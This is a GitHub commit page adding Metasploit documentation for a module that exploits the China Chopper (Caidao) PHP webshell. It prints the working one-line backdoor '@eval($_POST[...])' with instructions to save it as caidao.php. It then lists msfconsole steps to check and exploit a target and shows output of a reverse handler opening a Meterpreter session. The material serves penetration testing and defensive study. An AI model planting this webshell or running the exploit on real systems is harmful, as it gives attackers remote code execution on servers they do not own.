Skip to content

Commit 51a2354

Browse files
authored
Add KB for multi/http/caidao_php_backdoor_exec
1 parent 87d34cf commit 51a2354

File tree

1 file changed

+49
-0
lines changed

1 file changed

+49
-0
lines changed
Lines changed: 49 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,49 @@
1+
China Chopper Caidao PHP Backdoor or simply [Chinese Caidao](https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html) is a webshell manager coded in PHP.
2+
3+
## Vulnerable Application
4+
5+
Here is the PHP code of the backdoor that you can use and save it as caidao.php:
6+
7+
```
8+
<?php @eval($_POST["chopper"]);?>
9+
```
10+
11+
## Verification Steps
12+
13+
1. Install the application
14+
2. Start msfconsole
15+
3. Do: `use exploit/multi/http/caidao_php_backdoor_exec`
16+
4. Do: `set rport <port>`
17+
5. Do: `set rhost <ip>`
18+
6. Do: `check`
19+
```
20+
[+] 192.168.1.103:80 - The target is vulnerable.
21+
```
22+
8. Do: `exploit`
23+
9. You should get a shell.
24+
25+
## Options
26+
27+
**TARGETURI**
28+
29+
TARGETURI by default is `/caidao.php`, which is the common filename of the backdoor.
30+
31+
**PASSWORD**
32+
33+
PASSWORD by default is `chopper`, which is the password of the backdoor.
34+
35+
## Demonstration
36+
37+
```
38+
msf exploit(caidao_php_backdoor_exec) > exploit
39+
40+
[*] Started reverse handler on 192.168.1.108:4444
41+
[*] Sending stage (33068 bytes) to 192.168.1.103
42+
[*] Meterpreter session 2 opened (192.168.1.108:4444 -> 192.168.1.103:42349) at 2015-11-02 09:05:54 +0000
43+
44+
meterpreter > sysinfo
45+
Computer : kali
46+
OS : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686
47+
Meterpreter : php/php
48+
49+
```

0 commit comments

Comments
 (0)